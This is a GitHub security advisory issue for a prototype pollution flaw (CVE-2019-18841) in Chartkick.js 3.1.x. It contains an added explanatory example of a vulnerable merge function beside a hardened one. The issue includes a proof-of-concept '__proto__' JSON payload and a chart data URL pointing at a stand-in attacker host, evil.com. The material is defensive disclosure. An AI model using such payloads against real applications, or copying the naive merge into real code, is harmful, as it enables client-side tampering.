
Prototype Pollution in Chartkick.js 3.1.x #117

Closed
ankane opened this issue Nov 10, 2019 · 2 comments

Comments

@ankane
Owner

ankane commented Nov 10, 2019

Under certain conditions, the 3.1.x series of Chartkick.js is vulnerable to prototype pollution. This is the same type of issue that was announced for jQuery and other popular libraries earlier this year. jQuery rated this a "minor vulnerability". It's certainly unintended behavior, but since Chartkick.js is a client-side only library, its impact is likely limited. This vulnerability has been assigned the CVE identifier CVE-2019-18841.

Versions Affected: 3.1.0 to 3.1.3
Fixed Versions: 3.2.0
Versions Unaffected: < 3.1.0

Impact

Passing untrusted input to JSON.parse and the result to Chartkick.js can pollute Object.prototype.

var badOptions = JSON.parse('{"__proto__": {"test": true}}') // JSON.parse creates an own property literally named "__proto__"
new Chartkick.LineChart("chart", data, badOptions)          // the options merge walks that key and writes into Object.prototype
console.log("test" in {})                                    // true: every object now inherits "test"

A specially crafted response in data loaded via URL can cause pollution as well.

new Chartkick.LineChart("chart", "https://evil.com/data")

All users running an affected release should upgrade immediately.
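To make the mechanism above concrete, here is an added example (not Chartkick's own code): a hypothetical recursive option merge of the kind charting libraries use to combine user options with defaults, beside a hardened version that refuses prototype-affecting keys. The untrusted JSON is constructed to match the report.

```javascript
"use strict";

// Constructed sample input, shaped like the badOptions in the report.
const UNTRUSTED_JSON = '{"__proto__": {"test": true}, "colors": ["#f00"]}';

// Hypothetical vulnerable merge. `for...in` yields the own key "__proto__" that
// JSON.parse created, and `target["__proto__"]` on a plain object resolves (via
// the inherited accessor) to Object.prototype, so the recursion writes there.
function naiveMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (value !== null && typeof value === "object" && !Array.isArray(value)) {
      if (typeof target[key] !== "object" || target[key] === null) target[key] = {};
      naiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened merge: skip keys that can redirect writes to a prototype, and only
// recurse into objects the target actually owns rather than inherits.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) continue;
    const value = source[key];
    if (value !== null && typeof value === "object" && !Array.isArray(value)) {
      const owned = Object.prototype.hasOwnProperty.call(target, key);
      if (!owned || typeof target[key] !== "object" || target[key] === null) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Runs both merges on the same input and reports whether "test" leaked into
// every object. The pollution from naiveMerge is undone before the safe run.
function demonstrate() {
  const before = "test" in {};
  naiveMerge({}, JSON.parse(UNTRUSTED_JSON));
  const afterNaive = "test" in {};
  delete Object.prototype.test; // clean up so the rest of the process is unaffected
  const safeResult = safeMerge({}, JSON.parse(UNTRUSTED_JSON));
  const afterSafe = "test" in {};
  return { before, afterNaive, afterSafe, safeResult };
}

console.log(demonstrate());
```

The same allow-list check belongs in any place user-controlled JSON is merged into configuration, not only in chart options.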

@guimard

guimard commented Nov 16, 2019

Hi, are you sure this vulnerability does not exist before? In 2.1.0, I saw some lines that look like those fixed.

Cheers,

@ankane
Owner Author

ankane commented Nov 16, 2019

Hey @guimard, I didn't find any other affected versions in my testing, but please follow up with the email address in my profile if you can demonstrate the issue in other versions, and I'll update the CVE accordingly.
